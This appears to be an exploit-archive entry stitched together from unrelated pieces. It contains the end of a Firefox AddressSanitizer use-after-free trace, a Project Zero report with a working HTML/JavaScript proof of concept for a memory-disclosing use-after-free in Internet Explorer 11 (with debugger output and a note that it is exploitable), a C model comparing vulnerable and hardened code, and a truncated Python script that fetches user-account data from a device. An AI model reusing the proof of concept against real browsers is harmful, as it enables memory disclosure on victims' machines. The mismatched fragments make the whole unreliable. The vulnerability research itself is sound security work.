    #60 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #61 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #62 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #63 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #64 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
    #65 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #66 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #67 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #68 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #69 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #70 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #71 0x7f46dac64b7e in nsRootBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsRootBoxFrame.cpp:195:3
    #72 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #73 0x7f46da735b0a in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:63:5
    #74 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
    #75 0x7f46da6623a6 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3565:5
    #76 0x7f46da565487 in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6481:5
    #77 0x7f46d9d6c897 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:484:7
    #78 0x7f46d9d6be97 in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:416:9
    #79 0x7f46d9d6f40d in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1105:5
    #80 0x7f46da4bfc8a in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2037:7
    #81 0x7f46da4cbd25 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:305:7
    #82 0x7f46da4cb9f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:327:5
    #83 0x7f46da4ce063 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:722:5
    #84 0x7f46da4ce063 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:631
    #85 0x7f46da4c9157 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:508:9
    #86 0x7f46d3c2db89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #87 0x7f46d3c2a480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #88 0x7f46d4a43eb4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:124:5
    #89 0x7f46d49b5028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #90 0x7f46d49b5028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #91 0x7f46d49b5028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #92 0x7f46d9ded82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #93 0x7f46dd430051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #94 0x7f46dd5edc0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
    #95 0x7f46dd5ef708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
    #96 0x7f46dd5f09cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
    #97 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
    #98 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
    #99 0x7f46eefdb82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #100 0x41c2e8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c2e8)

0x60b000214ce8 is located 88 bytes inside of 112-byte region [0x60b000214c90,0x60b000214d00)
freed by thread T0 here:
    #0 0x4b2a3b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f46d3acb2c4 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
    #2 0x7f46d3acaeb6 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7f46d53d990e in AsyncFreeSnowWhite::Run() /home/worker/workspace/build/src/js/xpconnect/src/XPCJSContext.cpp:145:34
    #4 0x7f46d3c2db89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #5 0x7f46d3c2a480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #6 0x7f46d4a43ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #7 0x7f46d49b5028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #8 0x7f46d49b5028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #9 0x7f46d49b5028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #10 0x7f46d9ded82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #11 0x7f46dd430051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #12 0x7f46dd5edc0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
    #13 0x7f46dd5ef708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
    #14 0x7f46dd5f09cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
    #15 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
    #16 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
    #17 0x7f46eefdb82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291

previously allocated by thread T0 here:
    #0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e10cd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f46d6796c00 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f46d6796c00 in nsRange::CloneRange() const /home/worker/workspace/build/src/dom/base/nsRange.cpp:2495
    #4 0x7f46d67970ba in nsRange::CloneRange(nsIDOMRange**) /home/worker/workspace/build/src/dom/base/nsRange.cpp:2507:14
    #5 0x7f46d66801d4 in nsHTMLCopyEncoder::SetSelection(nsISelection*) /home/worker/workspace/build/src/dom/base/nsDocumentEncoder.cpp:1426:5
    #6 0x7f46d6596c5e in SelectionCopyHelper(nsISelection*, nsIDocument*, bool, short, unsigned int, nsITransferable**) /home/worker/workspace/build/src/dom/base/nsCopySupport.cpp:199:10
    #7 0x7f46da97e9ee in nsAutoCopyListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6667:10
    #8 0x7f46da95f019 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6254:5
    #9 0x7f46da97806c in NotifySelectionListeners /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:2429:12
    #10 0x7f46da97806c in mozilla::dom::Selection::Extend(nsINode&, unsigned int, mozilla::ErrorResult&) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:5762
    #11 0x7f46da9533e7 in Extend /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:5474:3
    #12 0x7f46da9533e7 in nsFrameSelection::TakeFocus(nsIContent*, unsigned int, unsigned int, mozilla::CaretAssociationHint, bool, bool) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1873
    #13 0x7f46da94ebaf in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1160:14
    #14 0x7f46da97c97d in mozilla::dom::Selection::Modify(nsAString_internal const&, nsAString_internal const&, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6426:8
    #15 0x7f46d730a949 in mozilla::dom::SelectionBinding::modify(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Selection*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:778:3
    #16 0x7f46d7fdbf77 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2951:13
    #17 0x7f46dda78c24 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:281:15
    #18 0x7f46dda78c24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:463
    #19 0x7f46dda5ef88 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:514:12
    #20 0x7f46dda5ef88 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2960
    #21 0x7f46dda4411a in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:409:12
    #22 0x7f46dda78eb7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:481:15
    #23 0x7f46dda79552 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:527:10
    #24 0x7f46de426f3c in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2865:12
    #25 0x7f46d7b59632 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #26 0x7f46d845fbbd in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #27 0x7f46d845fbbd in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #28 0x7f46d842a6f9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:16
    #29 0x7f46d842c5b4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #30 0x7f46d8416eb3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
    #31 0x7f46d841a744 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #32 0x7f46da62158e in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1044:7
    #33 0x7f46dcae3e7f in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7632:5
    #34 0x7f46dcadfc44 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7426:7
    #35 0x7f46dcae765f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7323:13

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:308:36 in operator!
Shadow bytes around the buggy address:
  0x0c168003a940: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c168003a950: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c168003a960: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c168003a970: 00 00 00 fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c168003a980: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
=>0x0c168003a990: fa fa fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd
  0x0c168003a9a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c168003a9b0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fd fd
  0x0c168003a9c0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c168003a9d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c168003a9e0: fd fd fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==119582==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1076

There is a use-after-free bug in IE which can lead to an info leak / memory disclosure.

The bug was confirmed on Internet Explorer version 11.0.9600.18537 (update version 11.0.38)

PoC:
=========================================
-->

<!-- saved from url=(0014)about:internet -->
<script>

function run() {
  var textarea = document.getElementById("textarea");
  var frame = document.createElement("iframe");

  textarea.appendChild(frame);

  frame.contentDocument.onreadystatechange = eventhandler;

  form.reset();
}

function eventhandler() {
  document.getElementById("textarea").defaultValue = "foo";
  alert("Text value freed, can be reallocated here");
}

</script>
<body onload=run()>
<form id="form">
<textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea>

<!--
=========================================

Please also see the attached screenshots that demonstrate using the PoC for memory disclosure.

The root cause of the bug is a use-after-free on the textarea text value, which can be seen if the PoC is run with Page Heap enabled. In that case IE crashes at

(b5c.f44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=10abbff8 ebx=00000002 ecx=10abbff8 edx=10abbff8 esi=0e024ffc edi=00000000
eip=7582c006 esp=0a3aac48 ebp=0a3aac54 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
msvcrt!wcscpy_s+0x46:
7582c006 0fb706          movzx   eax,word ptr [esi]       ds:002b:0e024ffc=????
0:008> k
 # ChildEBP RetAddr  
00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46
01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa
02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79
03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f
04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157
05 0a3aae40 706c05da MSHTML!CFastDOM::CHTMLFormElement::Trampoline_reset+0x33
06 0a3aaeb0 706b6d73 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d
07 0a3aaef8 706baa24 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
08 0a3ab19c 7071451a jscript9!Js::InterpreterStackFrame::Process+0x3a10
09 0a3ab1d4 70714579 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49
0a 0a3ab478 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x49a8
0b 0a3ab5b4 09780fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
WARNING: Frame IP not in any known module. Following frames may be wrong.
0c 0a3ab5c0 706bda16 0x9780fd9
0d 0a3ab868 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x1e62
0e 0a3ab984 09780fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
0f 0a3ab990 706b6d73 0x9780fe1
10 0a3ab9dc 706b73a8 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
11 0a3aba50 706b72dd jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
12 0a3aba98 706b7270 jscript9!ScriptSite::CallRootFunction+0x42
13 0a3abae4 7086d8f8 jscript9!ScriptSite::Execute+0xd2
14 0a3abb48 7165a587 jscript9!ScriptEngineBase::Execute+0xc7
15 0a3abc04 7165a421 MSHTML!CListenerDispatch::InvokeVar+0x15a
16 0a3abc30 7165a11c MSHTML!CListenerDispatch::Invoke+0x6d
17 0a3abcd0 7165a286 MSHTML!CEventMgr::_InvokeListeners+0x210
18 0a3abce8 7165a1ad MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42
19 0a3abd78 71659f1b MSHTML!CEventMgr::_InvokeListeners+0x150
1a 0a3abedc 714df1d7 MSHTML!CEventMgr::Dispatch+0x4d5
1b 0a3abf08 71969808 MSHTML!CEventMgr::DispatchEvent+0x90
1c 0a3abf40 7132de1f MSHTML!COmWindowProxy::Fire_onload+0x146
1d 0a3abfa0 7132df9c MSHTML!CMarkup::OnLoadStatusDone+0x5c0
1e 0a3abfbc 7132cd31 MSHTML!CMarkup::OnLoadStatus+0xed
1f 0a3ac400 714e8062 MSHTML!CProgSink::DoUpdate+0x48d
20 0a3ac40c 712de2f9 MSHTML!CProgSink::OnMethodCall+0x12
21 0a3ac45c 712ddcfa MSHTML!GlobalWndOnMethodCall+0x16c
22 0a3ac4b0 759962fa MSHTML!GlobalWndProc+0x103
23 0a3ac4dc 75996d3a user32!InternalCallWinProc+0x23
24 0a3ac554 759977c4 user32!UserCallWinProcCheckWow+0x109
25 0a3ac5b4 7599788a user32!DispatchMessageWorker+0x3b5
26 0a3ac5c4 726da99c user32!DispatchMessageW+0xf
27 0a3af794 7277ec38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
28 0a3af854 765182ec IEFRAME!LCIETab_ThreadProc+0x3e7
29 0a3af86c 73f73a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67
2a 0a3af8a4 75e0336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
2b 0a3af8b0 77b19902 kernel32!BaseThreadInitThunk+0xe
2c 0a3af8f0 77b198d5 ntdll!__RtlUserThreadStart+0x70
2d 0a3af908 00000000 ntdll!_RtlUserThreadStart+0x1b

where the old value was deleted (by the reallocation) at

0:008> !heap -p -a 0e024ffc
    address 0e024ffc found in
    _DPH_HEAP_ROOT @ f1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    dd03820:          e024000             2000
    7417947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d
    77bb126b ntdll!RtlDebugReAllocateHeap+0x00000033
    77b6de86 ntdll!RtlReAllocateHeap+0x00000054
    71ba761f MSHTML!CTravelLog::_AddEntryInternal+0x00000215
    71b8f48d MSHTML!MemoryProtection::HeapReAlloc<0>+0x00000026
    71b8f446 MSHTML!_HeapRealloc<0>+0x00000011
    7162deea MSHTML!BASICPROPPARAMS::SetStringProperty+0x00000546
    71678877 MSHTML!CBase::put_StringHelper+0x0000004d
    71fc6d60 MSHTML!CFastDOM::CHTMLTextAreaElement::Trampoline_Set_defaultValue+0x00000070
    706c05da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000019d
    706c0f77 jscript9!Js::JavascriptOperators::CallSetter+0x00000138
    706c0eb4 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
    70710cd3 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
    70710b26 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
    70710ba6 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
    706ba60e jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
    706bdbe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200

Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable.

Screenshots:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41661.zip
-->
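The re-entrancy pattern behind the crash above (reset() captures a pointer to the textarea's text, script runs the defaultValue setter which reallocates that text, then InjectInternal copies from the stale pointer) modelled in C as an added example. This is not Project Zero's PoC and not MSHTML code: the struct, the function names and the tracking allocator are hypothetical stand-ins. reset_vulnerable holds a raw pointer across the script callback the way the crash stack shows, reset_hardened snapshots the string before any script can run, and is_live plays the role Page Heap played in the report by flagging the read of a freed block instead of performing it.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>

/* Hypothetical tracking allocator standing in for Page Heap / ASan: it remembers
   which blocks are live so a read through a stale pointer is reported, not done. */
#define MAX_LIVE 16
static uintptr_t live_blocks[MAX_LIVE];

static void *tracked_alloc(size_t n)
{
    void *p = malloc(n);
    if (!p) abort();
    for (int i = 0; i < MAX_LIVE; i++)
        if (!live_blocks[i]) { live_blocks[i] = (uintptr_t)p; return p; }
    abort();                                   /* model table exhausted */
}

static void tracked_free(void *p)
{
    for (int i = 0; i < MAX_LIVE; i++)
        if (live_blocks[i] == (uintptr_t)p) { live_blocks[i] = 0; free(p); return; }
    abort();                                   /* double free or foreign pointer */
}

static int is_live(const void *p)
{
    for (int i = 0; i < MAX_LIVE; i++)
        if (live_blocks[i] == (uintptr_t)p) return 1;
    return 0;
}

#define VALUE_CAP 32

typedef struct textarea textarea_t;
struct textarea {
    wchar_t *default_value;                    /* heap string replaced by the defaultValue setter */
    wchar_t  value[VALUE_CAP];                 /* current text, fixed-size in this model */
    void   (*on_ready_state_change)(textarea_t *); /* script callback that re-enters the element */
};

/* Stands in for Trampoline_Set_defaultValue -> SetStringProperty -> HeapReAlloc in
   the free stack above: the old buffer is released and a new one takes its place. */
void set_default_value(textarea_t *ta, const wchar_t *s)
{
    size_t n = wcslen(s) + 1;
    wchar_t *p = tracked_alloc(n * sizeof *p);
    wmemcpy(p, s, n);
    if (ta->default_value) tracked_free(ta->default_value);
    ta->default_value = p;
}

/* Stands in for DoReset -> SetValueHelperInternal -> InjectInternal -> wcscpy_s:
   the source pointer is captured before script runs and dereferenced after.
   Returns 0 on success, -1 where the copy would read freed memory (the point at
   which Page Heap produced the access violation in the report). */
int reset_vulnerable(textarea_t *ta)
{
    const wchar_t *src = ta->default_value;                       /* captured here ...  */
    if (ta->on_ready_state_change) ta->on_ready_state_change(ta); /* ... script runs ... */
    if (!is_live(src)) return -1;                                 /* ... stale here      */
    wcsncpy(ta->value, src, VALUE_CAP - 1);
    ta->value[VALUE_CAP - 1] = L'\0';
    return 0;
}

/* Hardened form: never hold a raw pointer to element-owned heap data across a call
   that can run script. Snapshot the string first, then fire the callback. */
int reset_hardened(textarea_t *ta)
{
    wchar_t snapshot[VALUE_CAP];
    wcsncpy(snapshot, ta->default_value, VALUE_CAP - 1);
    snapshot[VALUE_CAP - 1] = L'\0';
    if (ta->on_ready_state_change) ta->on_ready_state_change(ta);
    wcscpy(ta->value, snapshot);
    return 0;
}

/* The PoC's handler: textarea.defaultValue = "foo" while reset() is still running. */
static void poc_handler(textarea_t *ta)
{
    set_default_value(ta, L"foo");
}

/* Replays the PoC sequence against the given reset implementation. Returns the
   reset's result code and leaves the resulting text value in out. */
int run_poc(int (*reset)(textarea_t *), wchar_t *out)
{
    textarea_t ta;
    memset(&ta, 0, sizeof ta);
    set_default_value(&ta, L"aaaaaaaaaaaaaaaaaaaaaaaa");  /* the PoC's initial content */
    ta.on_ready_state_change = poc_handler;
    int rc = reset(&ta);
    wcscpy(out, ta.value);
    tracked_free(ta.default_value);
    return rc;
}

int main(void)
{
    wchar_t out[VALUE_CAP];
    printf("vulnerable reset: %d (-1 = read from freed block)\n", run_poc(reset_vulnerable, out));
    printf("hardened reset:   %d\n", run_poc(reset_hardened, out));
    return 0;
}
```

The setter allocates the replacement before freeing the old block, so the two never share an address and the stale pointer is unambiguously dead when the copy runs; on a real heap the freed block is what an attacker reallocates, which is why the report can turn the bug into memory disclosure.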
================
get-user-info.py
================

import sys
import gzip
import zlib
import urllib2
from StringIO import StringIO


def make_requests():
    """Calls request functions sequentially."""
    response = [None]

    if request_ip(response):
        # Success: print the user-account data the device returned.
        print read_response(response[0])
        response[0].close()
    else:
        # Failure: no usable response.
        print "Request to %s failed" % sys.argv[1]


def read_response(response):
    """Returns the text contained in the response, e.g. the page HTML.
    Only handles the most common HTTP content encodings."""
    encoding = response.info().get('Content-Encoding')

    if encoding == 'gzip':
        buf = StringIO(response.read())
        return gzip.GzipFile(fileobj=buf).read()

    elif encoding == 'deflate':
        decompress = zlib.decompressobj(-zlib.MAX_WBITS)
        inflated = decompress.decompress(response.read())
        inflated += decompress.flush()
        return inflated

    return response.read()


def request_ip(response):
